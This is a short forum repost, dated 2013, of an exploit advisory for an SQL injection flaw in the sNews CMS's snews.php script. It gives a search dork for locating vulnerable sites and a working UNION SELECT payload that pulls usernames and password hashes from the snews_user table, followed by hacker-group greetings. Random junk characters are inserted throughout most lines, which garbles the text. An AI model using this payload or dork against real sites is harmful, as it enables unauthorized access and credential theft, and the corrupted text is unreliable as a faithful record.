标题: CMS snews SQL Injection Vulnerability
8 C5 r, g+ R& v作者: By onestree5 _( \& t) Q h5 }; |! N0 I
下载地址 : http://snewscms.com/
) d& o( m% T) N' V6 A' K测试平台 : ubuntu 12.10 / win 7
5 q, I, Q/ K: m3 K9 B' ~1 b: g; {关键词: inurl:"tanyakan pada rumput yang bergoyang"& I# W0 Y9 u2 }. }! `9 V$ F! N/ ^
^' x# h5 C6 D; M) V7 [ " o& y# q H$ ?
*************************************************************/ u2 P! i0 H* d9 i
% l' Y. a: F) N. Z RSQL poc: Z* |2 H/ I! ?* z/ C1 Z8 w
8 T% ]' h6 e# e+ y* ohttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]- `0 Q& j5 w0 N) H0 |: R9 S7 m5 X6 s
2 F8 e# g/ {! A3 V. P. M示例
7 u' X9 o5 `8 Q2 P # {/ Q0 j9 G/ H* T1 [
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
% s4 H. E- c9 J
* S0 m' r: k- Q! v& a n
" ]( P2 e) }- F致谢:+ e4 \& J: F2 J" Q% e
4 [/ d4 X. k/ K- e
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
! J5 D9 I7 l$ T# Q: [# v/ L # u7 \7 U8 c" Y' B2 n" `% }- r
indonesiancoder - moeslimh4x0r - go-coder2 l# f( j0 S* K3 [
{! P* r- m: i @; Ospesial my hunny :*: Z% D8 N! }" l$ L8 k$ t9 l, P! S
|
发表于 2013-1-23 08:55:06
收藏
支持
反对